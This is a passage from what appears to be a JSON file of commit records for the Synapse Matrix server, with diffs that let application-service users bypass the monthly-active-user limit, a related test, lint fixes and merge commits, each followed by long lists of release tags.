self.hs.config.appservice.track_appservice_user_ips", + "+ ):", + "+ await self.auth.check_auth_blocking(user_id)", + "diff --git a/synapse/handlers/register.py b/synapse/handlers/register.py", + "index 0d85fd086..039aff106 100644", + "--- a/synapse/handlers/register.py", + "+++ b/synapse/handlers/register.py", + "@@ -632,2 +632,3 @@ class RegistrationHandler(BaseHandler):", + " is_guest: bool = False,", + "+ is_appservice_ghost: bool = False,", + " ) -> Tuple[str, str]:", + "@@ -653,2 +654,3 @@ class RegistrationHandler(BaseHandler):", + " is_guest=is_guest,", + "+ is_appservice_ghost=is_appservice_ghost,", + " )", + "@@ -674,3 +676,6 @@ class RegistrationHandler(BaseHandler):", + " access_token = await self._auth_handler.get_access_token_for_user_id(", + "- user_id, device_id=registered_device_id, valid_until_ms=valid_until_ms", + "+ user_id,", + "+ device_id=registered_device_id,", + "+ valid_until_ms=valid_until_ms,", + "+ is_appservice_ghost=is_appservice_ghost,", + " )", + "diff --git a/synapse/replication/http/login.py b/synapse/replication/http/login.py", + "index 4c81e2d78..36071feb3 100644", + "--- a/synapse/replication/http/login.py", + "+++ b/synapse/replication/http/login.py", + "@@ -38,3 +38,5 @@ class RegisterDeviceReplicationServlet(ReplicationEndpoint):", + " @staticmethod", + "- async def _serialize_payload(user_id, device_id, initial_display_name, is_guest):", + "+ async def _serialize_payload(", + "+ user_id, device_id, initial_display_name, is_guest, is_appservice_ghost", + "+ ):", + " \"\"\"", + "@@ -50,2 +52,3 @@ class RegisterDeviceReplicationServlet(ReplicationEndpoint):", + " \"is_guest\": is_guest,", + "+ \"is_appservice_ghost\": is_appservice_ghost,", + " }", + "@@ -58,5 +61,10 @@ class RegisterDeviceReplicationServlet(ReplicationEndpoint):", + " is_guest = content[\"is_guest\"]", + "+ is_appservice_ghost = content[\"is_appservice_ghost\"]", + " device_id, access_token = await self.registration_handler.register_device(", + "- user_id, device_id, initial_display_name, is_guest", + "+ user_id,", + "+ device_id,", + "+ initial_display_name,", + "+ is_guest,", + "+ is_appservice_ghost=is_appservice_ghost,", + " )", + "diff --git a/synapse/rest/client/v2_alpha/register.py b/synapse/rest/client/v2_alpha/register.py", + "index a89ae6ddf..722d99381 100644", + "--- a/synapse/rest/client/v2_alpha/register.py", + "+++ b/synapse/rest/client/v2_alpha/register.py", + "@@ -657,5 +657,9 @@ class RegisterRestServlet(RestServlet):", + " )", + "- return await self._create_registration_details(user_id, body)", + "+ return await self._create_registration_details(", + "+ user_id, body, is_appservice_ghost=True,", + "+ )", + "- async def _create_registration_details(self, user_id, params):", + "+ async def _create_registration_details(", + "+ self, user_id, params, is_appservice_ghost=False", + "+ ):", + " \"\"\"Complete registration of newly-registered user", + "@@ -676,3 +680,7 @@ class RegisterRestServlet(RestServlet):", + " device_id, access_token = await self.registration_handler.register_device(", + "- user_id, device_id, initial_display_name, is_guest=False", + "+ user_id,", + "+ device_id,", + "+ initial_display_name,", + "+ is_guest=False,", + "+ is_appservice_ghost=is_appservice_ghost,", + " )", + "diff --git a/tests/test_mau.py b/tests/test_mau.py", + "index c5ec6396a..26548b461 100644", + "--- a/tests/test_mau.py", + "+++ b/tests/test_mau.py", + "@@ -21,2 +21,3 @@ from synapse.api.constants import LoginType", + " from synapse.api.errors import Codes, HttpResponseException, SynapseError", + "+from synapse.appservice import ApplicationService", + " from synapse.rest.client.v2_alpha import register, sync", + "@@ -77,2 +78,40 @@ class TestMauLimit(unittest.HomeserverTestCase):", + "+ def test_as_ignores_mau(self):", + "+ \"\"\"Test that application services can still create users when the MAU", + "+ limit has been reached.", + "+ \"\"\"", + "+", + "+ # Create and sync so that the MAU counts get updated", + "+ token1 = self.create_user(\"kermit1\")", + "+ self.do_sync_for_user(token1)", + "+ token2 = self.create_user(\"kermit2\")", + "+ self.do_sync_for_user(token2)", + "+", + "+ # check we're testing what we think we are: there should be two active users", + "+ self.assertEqual(self.get_success(self.store.get_monthly_active_count()), 2)", + "+", + "+ # We've created and activated two users, we shouldn't be able to", + "+ # register new users", + "+ with self.assertRaises(SynapseError) as cm:", + "+ self.create_user(\"kermit3\")", + "+", + "+ e = cm.exception", + "+ self.assertEqual(e.code, 403)", + "+ self.assertEqual(e.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)", + "+", + "+ # Cheekily add an application service that we use to register a new user", + "+ # with.", + "+ as_token = \"foobartoken\"", + "+ self.store.services_cache.append(", + "+ ApplicationService(", + "+ token=as_token,", + "+ hostname=self.hs.hostname,", + "+ id=\"SomeASID\",", + "+ sender=\"@as_sender:test\",", + "+ namespaces={\"users\": [{\"regex\": \"@as_*\", \"exclusive\": True}]},", + "+ )", + "+ )", + "+", + "+ self.create_user(\"as_kermit4\", token=as_token)", + "+", + " def test_allowed_after_a_month_mau(self):", + "@@ -194,3 +233,3 @@ class TestMauLimit(unittest.HomeserverTestCase):", + "- def create_user(self, localpart):", + "+ def create_user(self, localpart, token=None):", + " request_data = json.dumps(", + "@@ -203,3 +242,5 @@ class TestMauLimit(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"POST\", \"/register\", request_data)", + "+ request, channel = self.make_request(", + "+ \"POST\", \"/register\", request_data, access_token=token", + "+ )" + ], + "changed_files": [ + "synapse/handlers/auth.py", + "synapse/handlers/register.py", + "synapse/replication/http/login.py", + "synapse/rest/client/v2_alpha/register.py", + "tests/test_mau.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "c9dd47d66864714043b51a235909e3e957740c7b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608071286, + "hunks": 6, + "message": "lint", + "diff": [ + "diff --git a/tests/replication/test_auth.py b/tests/replication/test_auth.py", + "index c5ab3032a..f35a5235e 100644", + "--- a/tests/replication/test_auth.py", + "+++ b/tests/replication/test_auth.py", + "@@ -15,5 +15,3 @@", + " import logging", + "-from typing import Tuple", + "-from synapse.http.site import SynapseRequest", + " from synapse.rest.client.v2_alpha import register", + "diff --git a/tests/replication/test_client_reader_shard.py b/tests/replication/test_client_reader_shard.py", + "index abcc74f93..4608b65a0 100644", + "--- a/tests/replication/test_client_reader_shard.py", + "+++ b/tests/replication/test_client_reader_shard.py", + "@@ -16,3 +16,2 @@ import logging", + "-from synapse.http.site import SynapseRequest", + " from synapse.rest.client.v2_alpha import register", + "@@ -20,3 +19,3 @@ from synapse.rest.client.v2_alpha import register", + " from tests.replication._base import BaseMultiWorkerStreamTestCase", + "-from tests.server import FakeChannel, make_request", + "+from tests.server import make_request", + "diff --git a/tests/rest/client/v1/test_login.py b/tests/rest/client/v1/test_login.py", + "index 041f2766d..566776e97 100644", + "--- a/tests/rest/client/v1/test_login.py", + "+++ b/tests/rest/client/v1/test_login.py", + "@@ -717,3 +717,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " def register_as_user(self, username):", + "- channel = self.make_request(", + "+ self.make_request(", + " b\"POST\",", + "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", + "index da866c8b4..51323b3da 100644", + "--- a/tests/rest/client/v2_alpha/test_auth.py", + "+++ b/tests/rest/client/v2_alpha/test_auth.py", + "@@ -22,3 +22,2 @@ from synapse.api.constants import LoginType", + " from synapse.handlers.ui_auth.checkers import UserInteractiveAuthChecker", + "-from synapse.http.site import SynapseRequest", + " from synapse.rest.client.v1 import login", + "diff --git a/tests/unittest.py b/tests/unittest.py", + "index 16fd4f32b..39e5e7b85 100644", + "--- a/tests/unittest.py", + "+++ b/tests/unittest.py", + "@@ -22,3 +22,3 @@ import logging", + " import time", + "-from typing import Dict, Optional, Tuple, Type, TypeVar, Union, overload", + "+from typing import Dict, Optional, Type, TypeVar, Union" + ], + "changed_files": [ + "tests/replication/test_auth.py", + "tests/replication/test_client_reader_shard.py", + "tests/rest/client/v1/test_login.py", + "tests/rest/client/v2_alpha/test_auth.py", + "tests/unittest.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "adfc9cb53dc81a0eae06aea740a0ca4708cbdc0c", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607513208, + "hunks": 0, + "message": "Merge branch 'master' into develop", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "14eab1b4d2cf837c6b0925da7194cc5940e9401c", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608221653, + "hunks": 1, + "message": "Update tests/test_mau.py Co-authored-by: Andrew Morgan <1342360+anoadragon453@users.noreply.github.com>", + "diff": [ + "diff --git a/tests/test_mau.py b/tests/test_mau.py", + "index 26548b461..586294446 100644", + "--- a/tests/test_mau.py", + "+++ b/tests/test_mau.py", + "@@ -80,3 +80,4 @@ class TestMauLimit(unittest.HomeserverTestCase):", + " \"\"\"Test that application services can still create users when the MAU", + "- limit has been reached.", + "+ limit has been reached. This only works when application service", + "+ user ip tracking is disabled.", + " \"\"\"" + ], + "changed_files": [ + "tests/test_mau.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "a7a913918cf04c6d900223b19e719fafbbe94efa", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608285116, + "hunks": 2, + "message": "Merge remote-tracking branch 'origin/erikj/as_mau_block' into develop", + "diff": [ + "diff --cc tests/test_mau.py", + "index 02e56e1b0,586294446..51660b51d", + "--- a/tests/test_mau.py", + "+++ b/tests/test_mau.py", + "@@@ -203,3 -243,5 +243,5 @@@ class TestMauLimit(unittest.HomeserverT", + "- channel = self.make_request(\"POST\", \"/register\", request_data)", + " - request, channel = self.make_request(", + " - \"POST\", \"/register\", request_data, access_token=token", + "++ channel = self.make_request(", + "++ \"POST\", \"/register\", request_data, access_token=token,", + "+ )" + ], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + 